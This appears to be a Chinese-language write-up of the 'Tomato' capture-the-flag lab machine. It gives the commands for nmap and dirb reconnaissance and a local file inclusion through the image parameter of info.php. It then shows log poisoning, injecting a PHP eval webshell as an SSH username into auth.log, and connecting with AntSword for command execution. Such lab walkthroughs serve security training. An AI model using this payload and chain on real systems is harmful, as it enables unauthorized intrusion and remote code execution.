Tomato靶机
导入靶机

虚拟机设置里面选择NAT模式,并勾选设备状态下两个选项,设置好后重启靶机
在kali使用nmap对tomato进行信息收集
扫描开放的端口
目录扫描
使用dirb进行目录扫描:dirb http://192.168.247.137/

访问antibot_image目录

找到info.php

查看info.php的网页源码,发现存在文件包含漏洞

利用文件包含漏洞进行攻击
在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)
成功显示,说明存在文件包含漏洞
使用这个命令扫描全部端口
nmap -A 192.168.247.137 -p-
又发现了2211,ssh表示是远程链接
利用远程链接写木马攻击网站
ssh '<?php @eval($_POST[1]);?>'@192.168.247.137 -p 2211
这里很莫名其妙,kali的ssh就是无法连接一直显示remote username contains invalid characters
用其他方式链接就行
然后在网页端查看ubuntu报错信息:/var/log/auth.log
/var/log/auth.log 记录了所有和用户认证相关的日志 。
无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。
该目录下发现多了一些报错信息,大概率写入木马成功
使用中国蚁剑进行连接
上传了一句话木马的路径:http://192.168.247.137/antibot_image/antibots/info.php?image=../../../../../../../../var/log/auth.log
连接密码是刚刚POST传入的:1
成功拿到整个网站的目录信息
可以用虚拟终端执行命令